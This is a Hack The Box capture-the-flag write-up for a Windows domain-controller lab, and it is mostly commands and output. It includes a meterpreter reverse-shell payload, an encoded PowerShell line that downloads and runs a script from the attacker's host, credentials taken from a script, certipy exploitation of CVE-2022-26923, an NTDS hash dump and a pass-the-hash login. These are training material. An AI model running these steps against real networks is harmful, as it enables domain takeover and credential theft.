Certification

Enumeration:

sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp  open  http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57496/tcp open  msrpc         Microsoft Windows RPC
59262/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
64924/tcp open  msrpc         Microsoft Windows RPC

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126

SMB         10.129.230.126  445    CFN-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)

Visit http://10.129.230.126:8000/ and login with admin:admin. http://10.129.230.126:8000/settings/global allows you to define commands that are triggered through different events, e.g., Before Rename.

Preparation:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1

nano Public/bp-simple-runim64.ps1

echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA

cd Public/
sudo python3 -m http.server 80

Now trigger command execution by, for example, renaming a folder (http://10.129.230.126:8000/files/) and receive Meterpreter session.

meterpreter > cat user.txt

HTB{Abu51ng_F34tur3s_4r3_fun}

Nice. Discover user credentials:

meterpreter > cat applist.ps1

$user = "daniel.morgan"
$pass = "FDOnolk(naws)"

Challenge hints to ADCS. A recent vulnerability is presented here:

https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4

Enumeration:

certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'

...
Template Name                       : Machine
Certificate Authorities             : certification-CFN-SVRDC01-CA
Enabled                             : True
Client Authentication               : True
Enrollee Supplies Subject           : False
Certificate Name Flag               : SubjectRequireDnsAsCn
                                      SubjectAltRequireDns
Enrollment Flag                     : AutoEnrollment
Extended Key Usage                  : Client Authentication
                                      Server Authentication
Requires Manager Approval           : False
Application Policies                : 
Authorized Signatures Required      : 0
Validity Period                     : 1 year
Renewal Period                      : 6 weeks
Permissions
  Enrollment Permissions
    Enrollment Rights               : CERTIFICATION.HTB\Domain Admins
                                      CERTIFICATION.HTB\Domain Computers
                                      CERTIFICATION.HTB\Enterprise Admins
...

Looks good! Exploitation:

sudo nano /etc/hosts

10.129.224.146  CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb

(IP address has changed due to reboots)

Create a new machine account wtf$ and use the flag -dns to abuse CVE-2022–26923.

certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)

Password:
[*] Creating new account:
    sAMAccountName                      : wtf$
    unicodePwd                          : J6AeabTzuSGNFElP
    userAccountControl                  : 4096
    servicePrincipalName                : HOST/wtf
                                          RestrictedKrbHost/wtf
    dnsHostName                         : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'

Now request certificate. Only difference to blog post is the flag -dynamic-endpoint (did not work without it).

certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'

Use certificate to retrieve NT hash for domain controller:

certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a

DCSync:

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds

SMB         10.129.224.146  445    CFN-SVRDC01      [+] Dumping the NTDS, this could take a while so go grab a redbull...

SMB         10.129.224.146  445    CFN-SVRDC01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB         10.129.224.146  445    CFN-SVRDC01      Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.224.146  445    CFN-SVRDC01      krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB         10.129.224.146  445    CFN-SVRDC01      daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB         10.129.224.146  445    CFN-SVRDC01      SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB         10.129.224.146  445    CFN-SVRDC01      wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::

Collect flag:

impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb

# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt

HTB{c3rtif1c4t35_c4n_8e_f4k3d}

Excellent.